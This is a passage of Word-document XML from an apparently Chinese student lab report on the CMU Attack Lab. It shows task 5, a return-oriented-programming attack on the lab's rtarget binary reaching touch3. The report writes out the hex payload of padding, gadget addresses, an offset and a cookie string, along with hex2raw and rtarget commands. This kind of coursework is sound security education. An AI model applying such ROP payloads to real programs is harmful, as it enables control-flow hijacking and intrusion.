          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 19 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5519"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用vi编辑器创建文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”，将该段字符串保存后，使用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./hex2raw &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">txt&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”命令将该字节文本文件转为字符文本文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接下来使用命令“./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">–i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”将准备好的字符串读入程序中，运行结果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3409950" cy="550545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="34" name="图片 34" descr="P%V09E{([~)W5{2}{7}AX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P%V09E{([~)W5{2}{7}AXCM"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3409950" cy="550545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任务5：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>To solve Phase 5, you can use gadgets in the region of the code in rtarget demarcated by functions start_farm and end_farm. In addition to the gadgets used in Phase 4, this expanded farm includes the encodings of different movl instructions, as shown in Figure 3C. The byte sequences in this part of the farm also contain 2-byte instructions that serve as functional nops, i.e., they do not change any register or memory values. These include instructions, shown in Figure 3D, such as andb %al,%al, that operate on the low-order bytes of some of the registers but do not change their values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如图为补充的命令对应的机器码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5493385" cy="5527040"/>
            <wp:effectExtent l="0" t="0" r="254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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5509139" cy="5543055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运用ROP攻击来完成对touch3的攻击,同时将字符串的地址传到touch中：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所有有如下编译代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2212975" cy="855980"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="26" name="图片 26" descr="IMG_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34"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect r="59238" b="88176"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2212975" cy="855980"/>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经过查找后发现并无含add的gadget可以被利用，所以要将原代码改写为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3361690" cy="3091815"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="27" name="图片 27" descr="IMG_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34"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect l="3311" t="11308" r="4793" b="17640"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3361690" cy="309181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代码后紧跟的是操作码以及对应的gadget的地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>故输入字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0//填充缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">b </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>48 00 00 00 00 00 00 00//偏移量 因为在字符串前有9行指令，所以偏移72位，为0x48</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>f1 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>78 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>58 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2c 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>34 33 65 36 66 62 34 63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用vi编辑器创建文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>txt”，将该段字符串保存后，使用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./hex2raw &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">txt&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”命令将该字节文本文件转为字符文本文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接下来使用命令“./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
